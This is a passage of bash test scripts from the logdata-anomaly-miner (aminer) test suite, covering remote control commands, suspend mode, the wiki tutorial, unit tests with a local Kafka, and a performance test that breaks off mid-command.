in Analysis.EventCorrelationDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR blocklist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi EXEC_TIME=$(($(date +%s)-START_TIME)) echo "print_current_config(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_current_config(analysis_context)") expected="$PREFIX None" if [[ "$stdout" == "$expected" ]]; then echo "$ERROR print config had an execution error." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list="${expected_list}${stdout} " echo "reopen_event_handler_streams(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)") expected="$PREFIX'Reopened all StreamPrinterEventHandler streams.'" if [[ "$stdout" != "$expected" ]]; then echo "$ERROR reopen_event_handler_streams had an execution error." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list="${expected_list}${stdout} " sudo pkill -x aminer.py sudo pkill -x aminer sleep 3 sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog sudo aminer --config "$FILE" & > $OUTPUT_FILE for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done START_TIME=$(date +%s) stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) stdout=$(echo "$stdout" | sed -e "s/\"next_persist_time\".*,//") expected_list=$(echo "$expected_list" | sed -e "s/\"next_persist_time\".*,//") if [[ "$stdout" != "$expected_list" ]]; then echo "$ERROR exec-file." echo "$stdout" echo echo "Expected: $expected_list" echo exit_code=1 fi EXEC_FILE_TIME=$(($(date +%s)-START_TIME)) sudo pkill -x aminer.py sudo pkill -x aminer sleep 3 sudo rm $CMD_PATH sudo rm $OUTPUT_FILE echo "Command execution time with --exec ${EXEC_TIME}s" echo "Command execution time with --exec-file ${EXEC_FILE_TIME}s" exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runSuspendModeTest.sh000077500000000000000000000070141500476301700251550ustar00rootroot00000000000000#!/bin/bash sudo cp demo/aminerRemoteControl/demo-config.py /tmp/demo-config.py echo "config_properties['Core.PersistencePeriod'] = 15" | sudo tee -a /tmp/demo-config.py > /dev/null sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog FILE=/tmp/demo-config.py if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi exit_code=0 SUSPEND_FILE=/tmp/suspend_output.txt SUSPEND_FILE_MD5=/tmp/suspend.md5 sudo aminer --config "$FILE" > $SUSPEND_FILE & PID=$! for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done md5sum $SUSPEND_FILE > $SUSPEND_FILE_MD5 2> /dev/null echo "User username logged in" >> /tmp/syslog for i in {1..60}; do grep "Original log line: User username logged in" $SUSPEND_FILE > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done md5_result=`md5sum -c $SUSPEND_FILE_MD5 2> /dev/null` if [[ $md5_result == "$SUSPEND_FILE: OK" ]]; then echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (1)' exit_code=1 fi find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.log" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test1.md5 > /dev/null md5sum $SUSPEND_FILE > $SUSPEND_FILE_MD5 2> /dev/null sudo aminerremotecontrol --exec "suspend" > /dev/null echo " Current Disk Data is: Filesystem Type Size Used Avail Use% %" >> /tmp/syslog sleep 20 md5_result=`md5sum -c $SUSPEND_FILE_MD5 2> /dev/null` if [[ $md5_result != "$SUSPEND_FILE: OK" ]]; then echo 'The aminer has produced outputs after being suspended.' exit_code=1 fi find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.log" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test2.md5 > /dev/null sudo aminerremotecontrol --exec "activate" > /dev/null for i in {1..60}; do grep "Original log line: Current Disk Data is: Filesystem Type Size Used Avail Use% %" $SUSPEND_FILE > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done if [[ $md5_result == "/tmp/syslog: OK" ]]; then echo 'The aminer should have produced outputs, but md5sum does not indicate any changes. (2)' exit_code=1 fi for i in {1..60}; do test -f /tmp/lib/aminer/AnalysisChild/RepositioningData; if [[ $? == 0 ]]; then break; fi; sleep 1; done find /tmp/lib/aminer -type f ! -path "/tmp/lib/aminer/log/aminerRemoteLog.log" ! -path "/tmp/lib/aminer/log/aminer.log" ! -path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test3.md5 > /dev/null suspend_diff=`diff /tmp/test1.md5 /tmp/test2.md5` activate_diff=`diff /tmp/test2.md5 /tmp/test3.md5` if [[ $suspend_diff != "" ]]; then cat /tmp/test1.md5 cat /tmp/test2.md5 echo 'The aminer should not persist data after being suspended.' exit_code=1 fi if [[ $activate_diff == "" ]]; then cat /tmp/test2.md5 cat /tmp/test3.md5 echo 'The aminer should persist data after being activated.' exit_code=1 fi sudo pkill aminer sleep 3 wait $PID sudo rm /tmp/demo-config.py sudo rm /tmp/suspend_output.txt sudo rm /tmp/syslog sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo rm /tmp/suspend.md5 sudo rm /tmp/test1.md5 sudo rm /tmp/test2.md5 sudo rm /tmp/test3.md5 test -e /var/mail/mail && sudo rm -f /var/mail/mail exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runTryItOut.sh000077500000000000000000000375071500476301700236440ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write log lines from 4th to 5th ``` into /tmp/access_00 and /tmp/access_01. # 2.) Read 1st ```python to 6th ``` and compare it with ApacheAccessParsingModel. # 3.) Run the linking command between 7th and 8th ```. # 4.) Run the copy command from the 2nd line between 9th and 10th ``` and extract the CFG_PATH from that line. # 5.) Extract the line between 1st ```yaml and 11th ``` and replace LearnMode: False with it in CFG_PATH. # 6.) Replace LogResourceList path with "/tmp/access_00" in CFG_PATH. # 7.) Replace all Parser config lines in CFG_PATH with Parser config lines between 3rd ```yaml and 13th ```. # 8.) Replace all Input config lines in CFG_PATH with Input config lines between 4th ```yaml and 14th ```. # 9.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 5th ```yaml and 15th ```. # 10.) Replace all EventHandlers config lines in CFG_PATH with EventHandlers config lines between 6th ```yaml and 16th ```. # 11.) Parse the aminer CMD between 17th and 18th ``` and run it. Check if no error is output by the aminer. # 12.) Compare the results with the count report between 19th and 20th ``` (without actual numbers and timestamps - replace them with constant values). # 13.) Run the rm command between 21st and 22nd ``` to remove the persisted data. # 14.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 8th ```yaml and 26th ```, run CMD and check if no # error is output by the aminer by comparing the output with the lines between 27th and 28th ```. # 15.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 10th ```yaml and 34th ```, run CMD and check if no error is output by the aminer. # 16.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 11th ```yaml and 43th ```, run CMD and check if no error is output by the aminer. # 17.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 12th ```yaml and 48rd ```, run CMD and check if no error is output by the aminer. # 18.) Replace all Parser config lines in CFG_PATH with Parser config lines between 14th ```yaml and 58rd ```, run CMD and check if no error is output by the aminer. # 19.) Replace all Parser config lines in CFG_PATH with Parser config lines between 17th ```yaml and 65th ```, run CMD and check if no error is output by the aminer. # 20.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 18th ```yaml and 66st ```, run CMD and check if no error is output by the aminer. # 21.) Replace all Parser config lines in CFG_PATH with Parser config lines between 20th ```yaml and 74th ```, run CMD and check if no error is output by the aminer. # 22.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 21th ```yaml and 75th ```, run CMD and check if no error is output by the aminer. # 23.) Replace all Parser config lines in CFG_PATH with Parser config lines between 23nd ```yaml and 81th ```, run CMD and check if no error is output by the aminer. # 24.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 24rd ```yaml and 82th ```, run CMD and check if no error is output by the aminer. # 25.) Write the config between 26th ```yaml and 92th ``` to CFG_PATH, run CMD and check if no error is output by the aminer. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/aminer-TryItOut.md OUT=/tmp/out.txt LOG1=/tmp/access_00 LOG2=/tmp/access_01 # extract the file from the development branch of the wiki project. # the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # write access logs (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $LOG1 cp $LOG1 $LOG2 # compare ApacheAccessParsingModel (2.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/ait-lds/ApacheAccessParsingModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 2." exit_code=$((exit_code | $?)) # link available configs (3.) awk '/^```$/ && ++n == 7, /^```$/ && n++ == 8' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) sudo $CMD > $OUT 2> /dev/null # copy template config and extract CFG_PATH. (4.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) $CMD IFS=' ' read -ra ADDR <<< "$CMD" CFG_PATH=$(echo "${ADDR[-1]}") # replace LearnMode: False with LearnMode: True in CFG_PATH. (5.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) sed "s/#LearnMode: false/${OUT1}/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace LogResourceList file. (6.) OUT1=$(echo $LOG1) sed "s?file:///var/log/apache2/access.log?file:///${OUT1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace parser, input, analysis and event handler config lines (7.-10.) CFG_BEFORE=$(sed '/^Parser:$/Q' $CFG_PATH) CFG_PARSER=$(awk '/^Parser:$/,/^Input:$/' < $CFG_PATH) CFG_PARSER=$(echo "$CFG_PARSER" | sed '$d') CFG_INPUT=$(awk '/^Input:$/,/^Analysis:$/' < $CFG_PATH) CFG_INPUT=$(echo "$CFG_INPUT" | sed '$d') CFG_ANALYSIS=$(awk '/^Analysis:$/,/^EventHandlers:$/' < $CFG_PATH) CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed '$d') CFG_EVENT_HANDLERS=$(awk '/^EventHandlers:$/,/^$/' < $CFG_PATH) CFG_EVENT_HANDLERS=$(echo "$CFG_EVENT_HANDLERS" | sed '$d') CFG_PARSER=$(awk '/^```yaml$/ && ++n == 3, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_INPUT=$(awk '/^```yaml$/ && ++n == 4, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d') # change report_interval so the test does not need to wait 10 seconds CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed 's/report_interval: 10/report_interval: 3/g') CFG_EVENT_HANDLERS=$(awk '/^```yaml$/ && ++n == 6, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null # Parse the aminer CMD and run it. Check if no error is output by the aminer. (11.) awk '/^```$/ && ++n == 17, /^```$/ && n++ == 18' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 11." exit_code=$((exit_code | $?)) # Compare the results with the count report. (12.) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,7p' < $OUT) IN2=$(sed -n '8p' < $OUT) IN3=$(sed -n '9p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,7p' < $OUT) OUT2=$(sed -n '8p' < $OUT) OUT3=$(sed -n '9p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN2" IN2="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT2" OUT2="${ADDR[0]}" compareStrings "$OUT2" "$IN2" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN3" IN3="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT3" OUT3="${ADDR[0]}" compareStrings "$OUT3" "$IN3" "Failed Test in 12." exit_code=$((exit_code | $?)) # Remove the persisted data. (13.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $OUT CMD1=$(sed -n '2p' < $OUT) $CMD1 # Replace the Analysis config and compare the output. (14.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 8, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null sudo rm -r /var/lib/aminer/NewMatchPathValueDetector/accesslog_status 2> /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 14." exit_code=$((exit_code | $?)) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,23p' < $OUT) IN2=$(sed -n '25,27p' < $OUT) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,23p' < $OUT) OUT2=$(sed -n '25,27p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 14." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 14." exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (15.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 10, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 15." exit_code=$((exit_code | $?)) # skipping this check, because it has to change the log resources. #IN1=$(cat $OUT) #awk '/^```$/ && ++n == 39, /^```$/ && n++ == 40' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 15." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (16.) ANALYSIS_PREFIX='Analysis: ' CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 11, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$ANALYSIS_PREFIX$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 16." exit_code=$((exit_code | $?)) # skipping this check, because not all log lines were used in this test, so the output can not be reproduced. #IN1=$(sed -n '113,148p' < $OUT) #awk '/^```$/ && ++n == 46, /^```$/ && n++ == 47' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 16." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (17.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 12, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 17." exit_code=$((exit_code | $?)) # Replace the Parser config. (18.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 14, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 18." exit_code=$((exit_code | $?)) # Replace the Parser config. (19.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 17, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (20.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 18, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (21.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 20, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (22.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 21, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (23.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 23, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (24.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 24, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Run the final configuration. (25.) awk '/^```yaml$/ && ++n == 26, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 25." exit_code=$((exit_code | $?)) rm $OUT rm $LOG1 rm $LOG2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runUnittests.sh000077500000000000000000000044521500476301700240740ustar00rootroot00000000000000#!/bin/bash source config sudo cp unit/data/kafka-client.conf /etc/aminer/kafka-client.conf sudo cp unit/data/configfiles/Sub* /etc/aminer/conf-enabled/ curl $KAFKA_URL --output kafka.tgz tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 10 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sleep 10 exit_code=0 sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/analysis -p '*Test.py' > /dev/null & ANALYSIS_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/events -p '*Test.py' > /dev/null & EVENTS_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/input -p '*Test.py' > /dev/null & INPUT_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/parsing -p '*Test.py' > /dev/null & PARSING_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/util -p '*Test.py' > /dev/null & UTIL_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/data -p '*Test.py' > /dev/null & DATA_PID=$! wait $ANALYSIS_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Analysis unittests." fi wait $PARSING_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Parsing unittests." fi wait $UTIL_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Util unittests." fi wait $INPUT_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Input unittests." fi wait $EVENTS_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Events unittests." fi wait $DATA_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Data unittests." fi test -e /var/mail/mail && sudo rm -f /var/mail/mail sudo rm /tmp/test4unixSocket.sock sudo rm /tmp/test5unixSocket.sock sudo rm /tmp/test6unixSocket.sock sudo rm -r /tmp/lib/aminer/* $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf sudo rm /etc/aminer/conf-enabled/Sub* exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runVulture.sh000077500000000000000000000002041500476301700235270ustar00rootroot00000000000000#!/bin/bash vulture /usr/lib/logdata-anomaly-miner --min-confidence=100 --exclude "/usr/lib/logdata-anomaly-miner/.venv/*" exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/system/000077500000000000000000000000001500476301700223255ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/000077500000000000000000000000001500476301700257665ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/aminerSystemPerformanceTest.sh000077500000000000000000000046031500476301700340320ustar00rootroot00000000000000#!/bin/bash #This script should be used to test the performance of the aminer in different hardware setups or virtual machines with different ressources. MACHINE_NAME="Acer Aspire 5750g" CPU_NAME="i7-2630QM" CPU_Number="0.1" RAM_Used="32MB" Persistent_Memory_Type="SSD" AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* t=`date +%d.%m.%Y_%H-%M-%S` RESULTS_DIR=/tmp/results_$t RESULTS_PATH=/tmp/results.csv LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm -r $RESULTS_PATH 2> /dev/null mkdir $RESULTS_DIR FILE=/tmp/performance-config.py if ! test -f "$FILE"; then echo "$FILE does not exist!" exit fi if [[ $# -lt 2 ]]; then echo "Error, not enough parameters found!" echo "Please run the script with a parameter for the runtime in seconds and a parameter for the description." echo "For example: ./aminerSystemPerformanceTest.sh 900 \"Low performance test with many outputs. (./multiplyLogFile.sh 400000 syslog_low_performance_many_outputs-template /tmp/syslog)\"" exit fi before=`date +%s` waitingTime=$1 description=$2 endTime=$(($before+$waitingTime)) echo "" echo "calculating the MD5 sum of the logfile.." MD5=`md5sum $LOGFILE | awk '{ print $1 }'` echo "counting the lines of the logfile.." LINE_NUMBER=`wc -l < $LOGFILE | tr -d "\n"` python3 -c "import psutil" if [ $? -gt 0 ]; then sudo pip3 install psutil fi echo "Performance test started.." echo "" python3 generateSystemLogdata.py $((waitingTime+10)) 2> /tmp/error.log & #start aminer sudo -H -u aminer bash -c 'aminer --config '$FILE' & #2> /dev/null & #> /tmp/output &' PID=$! sleep $waitingTime touch $RESULTS_PATH sudo chown -R aminer:aminer $RESULTS_PATH #stop aminer and python3 sleep 3 sudo pkill -x 